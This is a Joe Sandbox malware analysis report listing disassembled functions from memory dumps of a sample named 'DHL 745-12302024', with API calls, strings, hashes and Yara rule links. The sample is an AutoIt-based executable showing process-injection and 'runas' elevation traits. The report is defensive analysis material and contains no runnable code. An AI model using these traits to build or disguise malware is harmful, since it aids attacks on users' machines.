Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f6a3d57c7fbbcfb71fca9398c82700b85e196c52d47d417864db1f75741b7608
Instruction ID: a3b59b40d4de0dccb5200e3d64d9cb3e1c23dc6df6e2f7d887c2de846c1e14b5
Opcode Fuzzy Hash: f6a3d57c7fbbcfb71fca9398c82700b85e196c52d47d417864db1f75741b7608
Instruction Fuzzy Hash: 19117C71200705BFDB219BAADD58FA77BB9EBC9B61F204169F402D6290DB71DC11C660

Function 00AA2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00A62B6B

Part of subcall function 00A63A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B31418,?,00A62E7F,?,?,?,00000000), ref: 00A63A78

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00B22224), ref: 00AA2C10
ShellExecuteW.SHELL32(00000000,?,?,00B22224), ref: 00AA2C17

Strings

runas, xrefs: 00AA2C0B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: c09d2c6634b6b51d96dd3a7708da1a0c0f886fcdbf0793c66c7a76b9a0f3b941
Instruction ID: ff067cf112bae475ff7875f91b378c2fb390b67c76d4bd62c5153ca24dc62bb3
Opcode Fuzzy Hash: c09d2c6634b6b51d96dd3a7708da1a0c0f886fcdbf0793c66c7a76b9a0f3b941
Instruction Fuzzy Hash: CA11E932208345AACB14FFA4DA51ABEB7F8DF91350F04082DF186571A2CF31894BD712

Function 00A6D730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00A6D807
timeGetTime.WINMM ref: 00A6DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6DB28
TranslateMessage.USER32(?), ref: 00A6DB7B
DispatchMessageW.USER32(?), ref: 00A6DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6DB9F
Sleep.KERNEL32(0000000A), ref: 00A6DBB1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 23c06c6d95635efb4443daa6e8602e82c3db5c573af5d87d7be2d24f6d57187c
Instruction ID: 271edbd46a245874c5dc82946e56256e31baed53470b7a364e9936a6f6554887
Opcode Fuzzy Hash: 23c06c6d95635efb4443daa6e8602e82c3db5c573af5d87d7be2d24f6d57187c
Instruction Fuzzy Hash: BA42C071B08241EFD728CF24C994BAABBF4FF55354F148A1EE4558B292DB70E844CB92

Function 00A62CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A62D07
RegisterClassExW.USER32(00000030), ref: 00A62D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A62D42
InitCommonControlsEx.COMCTL32(?), ref: 00A62D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A62D6F
LoadIconW.USER32(000000A9), ref: 00A62D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A62D94

Strings

0, xrefs: 00A62CE9
AutoIt v3 GUI, xrefs: 00A62D23
+, xrefs: 00A62CF0
TaskbarCreated, xrefs: 00A62D37

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d380c1ff7c57473ff10d71f563dfae55e0764c985e45a6f69027871c63a139d3
Instruction ID: d52e585a75e0a5a3b976af4d099789c45e4d9bae997347de4d51bf9baaa12195
Opcode Fuzzy Hash: d380c1ff7c57473ff10d71f563dfae55e0764c985e45a6f69027871c63a139d3
Instruction Fuzzy Hash: D321D3B190120CAFDB00DFE9ED49BADBBB8FB08710F10851AF611A72A0DBB11545CF94

Function 00AA065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AA0704,?,?,00000000,?,00AA0704,00000000,0000000C), ref: 00AA03B7

GetLastError.KERNEL32 ref: 00AA076F
__dosmaperr.LIBCMT ref: 00AA0776
GetFileType.KERNELBASE(00000000), ref: 00AA0782
GetLastError.KERNEL32 ref: 00AA078C
__dosmaperr.LIBCMT ref: 00AA0795
CloseHandle.KERNEL32(00000000), ref: 00AA07B5
CloseHandle.KERNEL32(?), ref: 00AA08FF
GetLastError.KERNEL32 ref: 00AA0931
__dosmaperr.LIBCMT ref: 00AA0938

Strings

H, xrefs: 00AA08BD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cd69f4cfb4eff2207b3c84c0a907b34edc01e8d57476429902000ae206f0f639
Instruction ID: adf1fa96ec9919dc4e27319d821e61bebeb7fd880c6ba4c9e8289b57cedd405b
Opcode Fuzzy Hash: cd69f4cfb4eff2207b3c84c0a907b34edc01e8d57476429902000ae206f0f639
Instruction Fuzzy Hash: 9BA10332A141098FDF19EFA8D952BAE7BA0AB0A324F240159F815DF2D1DB359912CB91

Function 00A6344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A63A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B31418,?,00A62E7F,?,?,?,00000000), ref: 00A63A78

Part of subcall function 00A63357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A63379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A6356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AA318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AA31CE
RegCloseKey.ADVAPI32(?), ref: 00AA3210
_wcslen.LIBCMT ref: 00AA3277
_wcslen.LIBCMT ref: 00AA3286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00A63560
\, xrefs: 00AA328C
Include, xrefs: 00AA3184, 00AA31C5
\Include\, xrefs: 00A63527

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: eeb598cfb3296df17c9f2e0470bb51ef9623e8959c94683ed27379f3ce18f9e1
Instruction ID: 0174ae2483b397f5b64528cf5561bd7a2e1f439edfb44fa84f2b310a9d0274cc
Opcode Fuzzy Hash: eeb598cfb3296df17c9f2e0470bb51ef9623e8959c94683ed27379f3ce18f9e1
Instruction Fuzzy Hash: 3B71A0724043059EC714EF65ED829AFBBF8FF95350F60482EF545832A0EB309A49CB56

Function 00A62B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A62B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00A62B9D
LoadIconW.USER32(00000063), ref: 00A62BB3
LoadIconW.USER32(000000A4), ref: 00A62BC5
LoadIconW.USER32(000000A2), ref: 00A62BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A62BEF
RegisterClassExW.USER32(?), ref: 00A62C40

Part of subcall function 00A62CD4: GetSysColorBrush.USER32(0000000F), ref: 00A62D07
Part of subcall function 00A62CD4: RegisterClassExW.USER32(00000030), ref: 00A62D31
Part of subcall function 00A62CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A62D42
Part of subcall function 00A62CD4: InitCommonControlsEx.COMCTL32(?), ref: 00A62D5F
Part of subcall function 00A62CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A62D6F
Part of subcall function 00A62CD4: LoadIconW.USER32(000000A9), ref: 00A62D85
Part of subcall function 00A62CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A62D94

Strings

AutoIt v3, xrefs: 00A62C2F
0, xrefs: 00A62C0F
#, xrefs: 00A62C16

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 2ac3447c0a784f73a223b88839ae16c483bba4cfa919e8edd095d9787663cf6a
Instruction ID: d3f8dbe11f01d59ddf8e02c2dd58989f685889ffc133cad25b8fcf55ca7e6ebe
Opcode Fuzzy Hash: 2ac3447c0a784f73a223b88839ae16c483bba4cfa919e8edd095d9787663cf6a
Instruction Fuzzy Hash: 0E211A71E00318BBDB10DFEAED55AAD7FB8FB48B50F20041AE600A76A0DBB11545CF98

Function 00A63170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A6316A,?,?), ref: 00A631D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00A6316A,?,?), ref: 00A63204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A63227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A6316A,?,?), ref: 00A63232
CreatePopupMenu.USER32 ref: 00A63246
PostQuitMessage.USER32(00000000), ref: 00A63267

Strings

TaskbarCreated, xrefs: 00A6322D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 497bce6090a5f768103cabb96315e4fd811752fe8fd7cef1a04f0a4efd87e9bd
Instruction ID: 6303787f31e0023439a5b03af7aadb6c40761a02fa885e4d4be28f6352cc1de7
Opcode Fuzzy Hash: 497bce6090a5f768103cabb96315e4fd811752fe8fd7cef1a04f0a4efd87e9bd
Instruction Fuzzy Hash: 49411533240204BBDF146BBC9E59BBD3A7DEB16350F240625F602C72A1DB619A53D7A1

Function 0168EC78 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0168ED49
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0168EF6F

Memory Dump Source

Source File: 00000000.00000002.1422791502.000000000168C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0168C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168c000_DHL 745-12302024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction ID: af23d8916fa5a615f811b3fc560fdcd11f610efa3a6dfc4e8f9254cc1f445264
Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction Fuzzy Hash: 2EA12C70E00209EBDB14DF98C898BEEBBB5FF48304F208259E511BB281D7759A45CF54

Function 00A62C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A62C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A62CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A61CAD,?), ref: 00A62CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A61CAD,?), ref: 00A62CCF

Strings

edit, xrefs: 00A62CAC
AutoIt v3, xrefs: 00A62C89, 00A62C8E, 00A62C8F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3a822f58431b9ef4e02bcf6fc95cd8d94a7fd6ed92432d257ed68ff6cb93e161
Instruction ID: 8d96d388f8fa9722da5f20fb5350e8cdf4a8919f5c6cf5136cf833f5d19bde3b
Opcode Fuzzy Hash: 3a822f58431b9ef4e02bcf6fc95cd8d94a7fd6ed92432d257ed68ff6cb93e161
Instruction Fuzzy Hash: 2CF05E755402987AEB30575BAC48EBB3EBDD7C6F60F20041EFA00A35A0DA711845DEB8

Function 0168EA78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0168E968: Sleep.KERNELBASE(000001F4), ref: 0168E979

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0168EB66

Strings

TDSD66DO02, xrefs: 0168EBC9, 0168EBCC

Memory Dump Source

Source File: 00000000.00000002.1422791502.000000000168C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0168C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168c000_DHL 745-12302024.jbxd

Similarity

API ID: CreateFileSleep
String ID: TDSD66DO02
API String ID: 2694422964-1065710194
Opcode ID: 7b115e233f8e9ff7ab293be433ac0d03c68634aab79122478861dcdba2050213
Instruction ID: 34c307237aecc922b81511f1dd6ec40c544dc140a8c14085853ef6d540fdb74a
Opcode Fuzzy Hash: 7b115e233f8e9ff7ab293be433ac0d03c68634aab79122478861dcdba2050213
Instruction Fuzzy Hash: 6951A031D00219EBEF21EBA4CC54BEEBB79AF18300F004699E619BB2C0D7751B45CBA5

Function 00A63B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A63B0F,SwapMouseButtons,00000004,?), ref: 00A63B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A63B0F,SwapMouseButtons,00000004,?), ref: 00A63B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00A63B0F,SwapMouseButtons,00000004,?), ref: 00A63B83

Strings

Control Panel\Mouse, xrefs: 00A63B3E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: c914e66230d06960b2ddcbb5bf8e53c1090ef2a9d4a52069c5c5047b89777a78
Instruction ID: 40903382d1b3f12ec8fcee382c05f943ad42dd81935f15e7e97a692f7e5f904c
Opcode Fuzzy Hash: c914e66230d06960b2ddcbb5bf8e53c1090ef2a9d4a52069c5c5047b89777a78
Instruction Fuzzy Hash: 38115AB2510208FFDF20CFA5DC44EEEB7B8EF01750B104459A802D7110E6319E429760

Function 0168D968 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0168E123
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0168E1B9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0168E1DB

Memory Dump Source

Source File: 00000000.00000002.1422791502.000000000168C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0168C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168c000_DHL 745-12302024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction ID: ef217cb27c9eebf964267fcc2971451144f6e6188767128fb26cf764fb69b3a4
Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction Fuzzy Hash: 0662EB34A142589BEB24DFA4CC50BDEB776EF58300F1091A9D10DEB390E77A9E81CB59

Function 00A6DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AB32B7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: e92d2afa6f28fb3a0a3730f286d228739846ff33d6b433b4624b7557d38c871d
Instruction ID: cf79162e9ce11338e98769981e6e02cb639a55f4642a387c779096473dd63de1
Opcode Fuzzy Hash: e92d2afa6f28fb3a0a3730f286d228739846ff33d6b433b4624b7557d38c871d
Instruction Fuzzy Hash: C8C29C79A00205CFCF24CF98C981AADB7F1BF18300F248169E916AB392D775EE41CB91

Function 00A63923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AA33A2

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A63A04

Strings

Line: , xrefs: 00AA33EB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: b655664735e4f2f9a84b887006f3cc968b5c7630eddf9f259613556663e64daf
Instruction ID: 95767c2d5e9f3e37054e9dd258424d3f0f7b2ad30e227f7388dfe6c7cddcae70
Opcode Fuzzy Hash: b655664735e4f2f9a84b887006f3cc968b5c7630eddf9f259613556663e64daf
Instruction Fuzzy Hash: AA31C172408304AACB21EB64DC45BEFB7FCAB44710F10492AF59A971D1DF709A4ACBD6

Function 00A7FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00A80668

Part of subcall function 00A832A4: RaiseException.KERNEL32(?,?,?,00A8068A,?,00B31444,?,?,?,?,?,?,00A8068A,00A61129,00B28738,00A61129), ref: 00A83304

__CxxThrowException@8.LIBVCRUNTIME ref: 00A80685

Strings

Unknown exception, xrefs: 00A80692

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 53eeefa8f9e9705f105cbb7e3800e059c16dbcde5c4deee830802c4014502f5d
Instruction ID: c0f3dae27660ace50b7df93ed98a059f894531e7e4dfa92f7ecd2b8107f67b7c
Opcode Fuzzy Hash: 53eeefa8f9e9705f105cbb7e3800e059c16dbcde5c4deee830802c4014502f5d
Instruction Fuzzy Hash: E2F0C23490020DBB8F14B7A4ED46D9E77AC5E00754B60C571B928D65A2FF71DB2AC790

Function 00AE7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AE82F5
TerminateProcess.KERNEL32(00000000), ref: 00AE82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00AE84DD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
